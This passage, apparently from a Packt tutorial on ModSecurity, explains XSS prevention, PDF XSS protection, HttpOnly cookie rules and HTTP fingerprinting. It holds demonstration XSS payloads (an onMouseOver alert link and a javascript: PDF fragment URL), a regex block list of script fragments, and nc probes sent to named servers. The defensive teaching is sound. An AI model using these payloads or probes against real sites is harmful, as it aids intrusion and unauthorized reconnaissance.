downloaded and executed, and to the injection of arbitrary content into web pages.
Cross-site scripting attacks can generally be divided into two categories:

Reflected attacks
This kind of attack exploits cases where the web application takes data provided by the user and includes it without sanitization in output pages. The attack is called "reflected" because an attacker causes a user to provide a malicious script to a server in a request that is then reflected back to the user in returned pages, causing the script to execute.

Stored attacks
In this type of XSS attack, the attacker is able to include his malicious payload in data that is permanently stored on the server and will be included, without any HTML entity encoding, to subsequent visitors to a page. Examples include storing malicious scripts in forum posts or user presentation pages. This type of XSS attack has the potential to be more damaging, since it can affect every user who views a certain page.

Preventing XSS attacks

The most important measure you can take to prevent XSS attacks is to make sure that all user-supplied data that is output in your web pages is properly sanitized. This means replacing potentially unsafe characters, such as angle brackets (< and >), with their corresponding HTML-entity encoded versions—in this case &lt; and &gt;. Here is a list of characters that you should encode when present in user-supplied data that will later be included in web pages:

Character  HTML-encoded version
<          &lt;
>          &gt;
(          &#40;
)          &#41;
#          &#35;
&          &amp;
"          &quot;
'          &#39;

In PHP, you can use the htmlentities() function to achieve this. When encoded, the string <script> will be converted into &lt;script&gt;. This latter version will be displayed as <script> in the web browser, without being interpreted as the start of a script by the browser. In general, users should not be allowed to input any HTML markup tags if it can be avoided.
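The encoding table above can be applied in Java with a few lines. This is a minimal sketch covering only the characters the article lists (a production application should prefer a maintained encoder library over a hand-rolled one):

```java
// Minimal HTML-entity encoder for the characters listed in the article.
public class HtmlEscape {

    public static String escape(String input) {
        StringBuilder out = new StringBuilder(input.length());
        for (char c : input.toCharArray()) {
            switch (c) {
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '(':  out.append("&#40;");  break;
                case ')':  out.append("&#41;");  break;
                case '#':  out.append("&#35;");  break;
                case '&':  out.append("&amp;");  break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);        // all other characters pass through
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        System.out.println(escape("<script>alert('XSS')</script>"));
    }
}
```

Running this against the classic <script> payload yields text that the browser displays literally instead of executing, which is the whole point of output sanitization.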
If you do allow markup such as <a href="..."> to be input by users in blog comments, forum posts, and similar places, then you should be aware that simply filtering out the <script> tag is not enough, as this simple example shows:

<a href="http://www.google.com" onMouseOver="javascript:alert('XSS Exploit!')">Innocent link</a>

This link will execute the JavaScript code contained within the onMouseOver attribute whenever the user hovers his mouse pointer over the link. You can see why, even if the web application replaced <script> tags with their HTML-encoded version, an XSS exploit would still be possible by simply using onMouseOver or any of the other related events available, such as onClick or onMouseDown. I want to stress that properly sanitizing user input as just described is the most important step you can take to prevent XSS exploits from occurring. That said, if you want to add an additional line of defense by creating ModSecurity rules, here are some common XSS script fragments and regular expressions for blocking them:

Script fragment  Regular expression
<script          <script
eval(            eval\s*\(
onMouseOver      onmouseover
onMouseOut       onmouseout
onMouseDown      onmousedown
onMouseMove      onmousemove
onClick          onclick
onDblClick       ondblclick
onFocus          onfocus

PDF XSS protection

You may have seen the ModSecurity directive SecPdfProtect mentioned, and wondered what it does. This directive exists to protect users from a particular class of cross-site scripting attack that affects users running a vulnerable version of the Adobe Acrobat PDF reader. A little background is required in order to understand what SecPdfProtect does and why it is necessary. In 2007, Stefano Di Paola and Giorgio Fedon discovered a vulnerability in Adobe Acrobat that allows attackers to insert JavaScript into requests, which is then executed by Acrobat in the context of the site hosting the PDF file. Sound confusing? Hang on, it will become clearer in a moment.
The vulnerability was quickly fixed by Adobe in version 7.0.9 of Acrobat. However, there are still many users out there running old versions of the reader, which is why preventing this sort of attack is still an ongoing concern. The basic attack works like this: An attacker entices the victim to click a link to a PDF file hosted on www.example.com. Nothing unusual so far, except for the fact that the link looks like this: http://www.example.com/document.pdf#x=javascript:alert('XSS'); Surprisingly, vulnerable versions of Adobe Acrobat will execute the JavaScript in the above link. It doesn't even matter what you place before the equal sign, gibberish= will work just as well as x= in triggering the exploit. Since the PDF file is hosted on the domain www.example.com, the JavaScript will run as if it was a legitimate piece of script within a page on that domain. This can lead to all of the standard cross-site scripting attacks that we have seen examples of before. This diagram shows the chain of events that allows this exploit to function: The vulnerability does not exist if a user downloads the PDF file and then opens it from his local hard drive. ModSecurity solves the problem of this vulnerability by issuing a redirect for all PDF files. The aim is to convert any URLs like the following: http://www.example.com/document.pdf#x=javascript:alert('XSS'); into a redirected URL that has its own hash character: http://www.example.com/document.pdf#protection This will block any attacks attempting to exploit this vulnerability. The only problem with this approach is that it will generate an endless loop of redirects, as ModSecurity has no way of knowing what is the first request for the PDF file, and what is a request that has already been redirected. ModSecurity therefore uses a one-time token to keep track of redirect requests. All redirected requests get a token included in the new request string. 
The redirect link now looks like this:

http://www.example.com/document.pdf?PDFTOKEN=XXXXX#protection

ModSecurity keeps track of these tokens so that it knows which links are valid and should lead to the PDF file being served. Even if a token is not valid, the PDF file will still be available to the user; he will just have to download it to the hard drive. These are the directives used to configure PDF XSS protection in ModSecurity:

SecPdfProtect On
SecPdfProtectMethod TokenRedirection
SecPdfProtectSecret "SecretString"
SecPdfProtectTimeout 10
SecPdfProtectTokenName "token"

The above configures PDF XSS protection, and uses the secret string SecretString to generate the one-time tokens. The last directive, SecPdfProtectTokenName, can be used to change the name of the token argument (the default is PDFTOKEN). This can be useful if you want to hide the fact that you are running ModSecurity, but unless you are really paranoid it won't be necessary to change this. The SecPdfProtectMethod can also be set to ForcedDownload, which will force users to download the PDF files instead of viewing them in the browser. This can be an inconvenience to users, so you would probably not want to enable this unless circumstances warrant (for example, if a new PDF vulnerability of the same class is discovered in the future).

HttpOnly cookies to prevent XSS attacks

One mechanism to mitigate the impact of XSS vulnerabilities is the HttpOnly flag for cookies.
This extension to the cookie protocol was proposed by Microsoft (see http://msdn.microsoft.com/en-us/library/ms533046.aspx for a description), and is currently supported by the following browsers:

Internet Explorer (IE6 SP1 and later)
Firefox (2.0.0.5 and later)
Google Chrome (all versions)
Safari (3.0 and later)
Opera (version 9.50 and later)

HttpOnly cookies work by adding the HttpOnly flag to cookies that are returned by the server, which instructs the web browser that the cookie should only be used when sending HTTP requests to the server and should not be made available to client-side scripts via, for example, the document.cookie property. While this doesn't completely solve the problem of XSS attacks, it does mitigate those attacks where the aim is to steal valuable information from the user's cookies, such as session IDs. A cookie header with the HttpOnly flag set looks like this:

Set-Cookie: SESSID=d31cd4f599c4b0fa4158c6fb; HttpOnly

HttpOnly cookies need to be supported on the server side for clients to be able to take advantage of the extra protection afforded by them. Some web development platforms currently support HttpOnly cookies through the use of the appropriate configuration option. For example, PHP 5.2.0 and later allow HttpOnly cookies to be enabled for a page by using the following ini_set() call:

<?php
ini_set("session.cookie_httponly", 1);
?>

Tomcat (a Java Servlet and JSP server) version 6.0.19 and later supports HttpOnly cookies, and they can be enabled by modifying a context's configuration so that it includes the useHttpOnly option, like so:

<Context>
  <Manager useHttpOnly="true"/>
</Context>

In case you are using a web platform that doesn't support HttpOnly cookies, it is actually possible to use ModSecurity to add the flag to outgoing cookies. We will see how to do this now.
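The core of that flag-adding logic can be sketched in plain Java: inspect an outgoing Set-Cookie value and append the flag only when it is missing, case-insensitively. This stand-alone sketch (the class and method names are ours) mirrors the case-insensitive test that a real server-side filter would apply:

```java
import java.util.regex.Pattern;

// Sketch: append the HttpOnly flag to a Set-Cookie header value when the
// platform does not do it for you. The case-insensitive check matters
// because "httponly" and "HttpOnly" are equivalent on the wire.
public class HttpOnlyFlag {

    private static final Pattern HTTP_ONLY = Pattern.compile("(?i)httponly");

    public static String ensureHttpOnly(String setCookieValue) {
        if (HTTP_ONLY.matcher(setCookieValue).find()) {
            return setCookieValue; // flag already present, leave untouched
        }
        return setCookieValue + "; HttpOnly";
    }

    public static void main(String[] args) {
        System.out.println(ensureHttpOnly("SESSID=d31cd4f599c4b0fa4158c6fb"));
        System.out.println(ensureHttpOnly("SESSID=abc; HttpOnly"));
    }
}
```

In a servlet container this logic would live in a filter that rewrites response headers; here it is reduced to pure string handling so it can run anywhere.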
Session identifiers

Assuming we want to add the HttpOnly flag to session identifier cookies, we need to know which cookies are associated with session identifiers. The following table lists the name of the session identifier cookie for some of the most common languages:

Language   Session identifier cookie name
PHP        PHPSESSID
JSP        JSESSIONID
ASP        ASPSESSIONID
ASP.NET    ASP.NET_SessionId

The table shows us that a good regular expression to identify session IDs would be (sessionid|sessid), which can be shortened to sess(ion)?id. The web programming language you are using might use another name for the session cookie. In that case, you can always find out what it is by looking at the headers returned by the server:

echo -e "GET / HTTP/1.1\nHost: yourserver.com\n\n" | nc yourserver.com 80 | head

Look for a line similar to:

Set-Cookie: JSESSIONID=4EFA463BFB5508FFA0A3790303DE0EA5; Path=/

This is the session cookie—in this case its name is JSESSIONID, since the server is running Tomcat and the JSP web application language. The following rules are used to add the HttpOnly flag to session cookies:

#
# Add HttpOnly flag to session cookies
#
SecRule RESPONSE_HEADERS:Set-Cookie "!(?i:HttpOnly)" "phase:3,chain,pass"
SecRule MATCHED_VAR "(?i:sess(ion)?id)" "setenv:session_cookie=%{MATCHED_VAR}"
Header set Set-Cookie "%{SESSION_COOKIE}e; HttpOnly" env=session_cookie

We are putting the rule chain in phase 3—RESPONSE_HEADERS, since we want to inspect the response headers for the presence of a Set-Cookie header. We are looking for those Set-Cookie headers that do not contain an HttpOnly flag. The (?i: ) parentheses are a regular expression construct known as a mode-modified span. This tells the regular expression engine to ignore the case of the HttpOnly string when attempting to match.
Using the t:lowercase transform would have been more complicated, as we will be using the matched variable in the next rule, and we don't want the case of the variable modified when we set the environment variable.
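The matching logic the rule chain applies - a cookie name matching sess(ion)?id, case-insensitively, with no HttpOnly flag present - can be prototyped in a few lines to test the regular expressions before deploying them. The needs_httponly helper below is an illustration, not part of ModSecurity:

```python
import re

# Same patterns as in the SecRule chain above
SESSION_RE = re.compile(r"sess(ion)?id", re.IGNORECASE)
HTTPONLY_RE = re.compile(r"HttpOnly", re.IGNORECASE)

def needs_httponly(set_cookie: str) -> bool:
    """Flag session cookies that lack the HttpOnly attribute."""
    return bool(SESSION_RE.search(set_cookie)) and not HTTPONLY_RE.search(set_cookie)

headers = [
    "JSESSIONID=4EFA463BFB5508FFA0A3790303DE0EA5; Path=/",
    "PHPSESSID=abc123; HttpOnly",
    "theme=dark; Path=/",
]
for h in headers:
    if needs_httponly(h):
        print(h + "; HttpOnly")  # only the first header is rewritten
```

Only the JSESSIONID cookie in the sample list is a session cookie missing the flag, so only that header would be rewritten - mirroring what the chained rules and the Header directive do on the server.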
Packt
01 Dec 2009

Blocking Common Attacks using ModSecurity 2.5: Part 1

Web applications can be attacked from a number of different angles, which is what makes defending against them so difficult. Here are just a few examples of where things can go wrong to allow a vulnerability to be exploited:

- The web server process serving requests can be vulnerable to exploits. Even servers such as Apache, that have a good security track record, can still suffer from security problems - it's just a part of the game that has to be accepted.
- The web application itself is of course a major source of problems. Originally, HTML documents were meant to be just that - documents. Over time, and especially in the last few years, they have evolved to also include code, such as client-side JavaScript. This can lead to security problems. A parallel can be drawn to Microsoft Office, which in earlier versions was plagued by security problems in its macro programming language. This, too, was caused by documents and executable code being combined in the same file.
- Supporting modules, such as mod_php which is used to run PHP scripts, can be subject to their own security vulnerabilities.
- Backend database servers, and the way that the web application interacts with them, can be a source of problems ranging from disclosure of confidential information to loss of data.

HTTP fingerprinting

Only amateur attackers blindly try different exploits against a server without having any idea beforehand whether they will work or not. More sophisticated adversaries will map out your network and system to find out as much information as possible about the architecture of your network and what software is running on your machines. An attacker looking to break in via a web server will try to find one he knows he can exploit, and this is where a method known as HTTP fingerprinting comes into play.
We are all familiar with fingerprinting in everyday life - the practice of taking a print of the unique pattern of a person's finger to be able to identify him or her - for purposes such as identifying a criminal or opening the access door to a biosafety laboratory. HTTP fingerprinting works in a similar manner by examining the unique characteristics of how a web server responds when probed and constructing a fingerprint from the gathered information. This fingerprint is then compared to a database of fingerprints for known web servers to determine what server name and version is running on the target system.

More specifically, HTTP fingerprinting works by identifying subtle differences in the way web servers handle requests - a differently formatted error page here, a slightly unusual response header there - to build a unique profile of a server that allows its name and version number to be identified. Depending on which viewpoint you take, this can be useful to a network administrator to identify which web servers are running on a network (and which might be vulnerable to attack and need to be upgraded), or it can be useful to an attacker since it will allow him to pinpoint vulnerable servers. We will be focusing on two fingerprinting tools:

- httprint: One of the original tools - the current version is 0.321 from 2005, so it hasn't been updated with new signatures in a while. Runs on Linux, Windows, Mac OS X, and FreeBSD.
- httprecon: A newer tool which was first released in 2007 and is still in active development. Runs on Windows.

Let's first run httprecon against a standard Apache 2.2 server, and then run httprint against the same server and see what happens. As we can see, both tools correctly guess that the server is running Apache. They get the minor version number wrong, but both tell us that the major version is Apache 2.x. Try it against your own server!
You can download httprint at http://www.net-square.com/httprint/ and httprecon at http://www.computec.ch/projekte/httprecon/.

Tip: If you get the error message Fingerprinting Error: Host/URL not found when running httprint, then try specifying the IP address of the server instead of the hostname.

The fact that both tools are able to identify the server should come as no surprise as this was a standard Apache server with no attempts made to disguise it. In the following sections, we will be looking at how fingerprinting tools distinguish different web servers and see if we are able to fool them into thinking the server is running a different brand of web server software.

How HTTP fingerprinting works

There are many ways a fingerprinting tool can deduce which type and version of web server is running on a system. Let's take a look at some of the most common ones.

Server banner

The server banner is the string returned by the server in the Server response header (for example: Apache/1.3.3 (Unix) (Red Hat/Linux)). This banner can be changed by using the ModSecurity directive SecServerSignature. Here is what to do to change the banner:

# Change the server banner to MyServer 1.0
ServerTokens Full
SecServerSignature "MyServer 1.0"

Response header

The HTTP response header contains a number of fields that are shared by most web servers, such as Server, Date, Accept-Ranges, Content-Length, and Content-Type. The order in which these fields appear can give a clue as to which web server type and version is serving the response. There can also be other subtle differences - the Netscape Enterprise Server, for example, prints its headers as Last-modified and Accept-ranges, with a lowercase letter in the second word, whereas Apache and Internet Information Server print the same headers as Last-Modified and Accept-Ranges.
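Header order is easy to check programmatically. The sketch below parses a raw HTTP response and returns the header names in the order the server sent them; the header_order helper and the sample response bytes are illustrative:

```python
def header_order(raw_response: bytes) -> list[str]:
    """Return response header names in the order the server sent them."""
    head = raw_response.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    # Skip the status line, keep only "Name: value" lines
    return [line.split(":", 1)[0] for line in head.split("\r\n")[1:] if ":" in line]

# A response in the header order typical of an Apache server
apache = (b"HTTP/1.1 200 OK\r\n"
          b"Date: Mon, 27 Apr 2009 09:10:49 GMT\r\n"
          b"Server: Apache/2.2.8 (Fedora)\r\n"
          b"Content-Type: text/html\r\n\r\n")
print(header_order(apache))  # ['Date', 'Server', 'Content-Type']
```

Comparing the resulting order (and the exact capitalization of each name) against known profiles is one of the signals a fingerprinting tool combines to identify the server.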
HTTP protocol responses

Another way to gain information on a web server is to issue a non-standard or unusual HTTP request and observe the response that is sent back by the server.

Issuing an HTTP DELETE request

The HTTP DELETE command is meant to be used to delete a document from a server. Of course, all servers require that a user is authenticated before this happens, so a DELETE command from an unauthorized user will result in an error message - the question is just which error message exactly, and what HTTP error number will the server be using for the response page? Here is a DELETE request issued to our Apache server:

$ nc bytelayer.com 80
DELETE / HTTP/1.0

HTTP/1.1 405 Method Not Allowed
Date: Mon, 27 Apr 2009 09:10:49 GMT
Server: Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2
Allow: GET,HEAD,POST,OPTIONS,TRACE
Content-Length: 303
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method DELETE is not allowed for the URL /index.html.</p>
<hr>
<address>Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2 Server at www.bytelayer.com Port 80</address>
</body></html>

As we can see, the server returned a 405 - Method Not Allowed error. The error message accompanying this response in the response body is given as The requested method DELETE is not allowed for the URL /index.html.
Now compare this with the following response, obtained by issuing the same request to a server at www.iis.net:

$ nc www.iis.net 80
DELETE / HTTP/1.0

HTTP/1.1 405 Method Not Allowed
Allow: GET, HEAD, OPTIONS, TRACE
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CSAnonymous=LmrCfhzHyQEkAAAANWY0NWY1NzgtMjE2NC00NDJjLWJlYzYtNTc4ODg0OWY5OGQz0; domain=iis.net; expires=Mon, 27-Apr-2009 09:42:35 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Mon, 27 Apr 2009 09:22:34 GMT
Connection: close
Content-Length: 1293

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>405 - HTTP verb used to access this page is not allowed.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>405 - HTTP verb used to access this page is not allowed.</h2>
<h3>The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access.</h3>
</fieldset></div>
</div>
</body>
</html>

The site www.iis.net is Microsoft's official site for its web server platform Internet Information Services, and the Server response header indicates that it is indeed running IIS-7.0.
(We have of course already seen that it is a trivial operation in most cases to fake this header, but given the fact that it's Microsoft's official IIS site we can be pretty sure that they are indeed running their own web server software.) The response generated by IIS carries the same HTTP error code, 405; however, there are many subtle differences in the way the response is generated. Here are just a few:

- IIS uses spaces in between method names in the comma-separated list for the Allow field, whereas Apache does not
- The response header field order differs - for example, Apache has the Date field first, whereas IIS starts out with the Allow field
- IIS uses the error message The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access in the response body

Bad HTTP version numbers

A similar experiment can be performed by specifying a non-existent HTTP protocol version number in a request. Here is what happens on the Apache server when the request GET / HTTP/5.0 is issued:

$ nc bytelayer.com 80
GET / HTTP/5.0

HTTP/1.1 400 Bad Request
Date: Mon, 27 Apr 2009 09:36:10 GMT
Server: Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2
Content-Length: 295
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br /></p>
<hr>
<address>Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2 Server at www.bytelayer.com Port 80</address>
</body></html>

There is no HTTP version 5.0, and there probably won't be for a long time, as the latest revision of the protocol carries version number 1.1. The Apache server responds with a 400 - Bad Request error, and the accompanying error message in the response body is Your browser sent a request that this server could not understand.
Now let's see what IIS does:

$ nc www.iis.net 80
GET / HTTP/5.0

HTTP/1.1 400 Bad Request
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Mon, 27 Apr 2009 09:38:37 GMT
Connection: close
Content-Length: 334

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Bad Request</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
<BODY><h2>Bad Request - Invalid Hostname</h2>
<hr><p>HTTP Error 400. The request hostname is invalid.</p>
</BODY></HTML>

We get the same error number, but the error message in the response body differs - this time it's HTTP Error 400. The request hostname is invalid. As HTTP 1.1 requires a Host header to be sent with requests, it is obvious that IIS assumes that any later protocol version would also require this header, and the error message reflects this fact.
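The probes above were issued with nc; the same can be done from a short script, and the distinguishing error messages quoted in this section can then be matched against the response body. The raw_request and guess_server helpers and the signature table below are illustrative sketches, not taken from any fingerprinting tool; only probe hosts you are authorized to test:

```python
import socket

# Distinguishing error-body fragments quoted earlier in this section
SIGNATURES = {
    "Apache": "The requested method DELETE is not allowed",
    "IIS": "HTTP verb used to access this page is not allowed",
}

def raw_request(host: str, request: str, port: int = 80) -> str:
    """Send a raw HTTP request (like the nc examples) and return the response."""
    with socket.create_connection((host, port), timeout=10) as s:
        s.sendall(request.encode())
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("iso-8859-1", errors="replace")

def guess_server(error_body: str) -> str:
    """Guess the server type from the wording of its 405 error page."""
    for name, marker in SIGNATURES.items():
        if marker in error_body:
            return name
    return "unknown"

# Example probe (uncomment against a host you are authorized to test):
# body = raw_request("bytelayer.com", "DELETE / HTTP/1.0\r\n\r\n")
# print(guess_server(body))
```

This is essentially what httprint and httprecon do, just with much larger signature databases and many more probes combined into a single verdict.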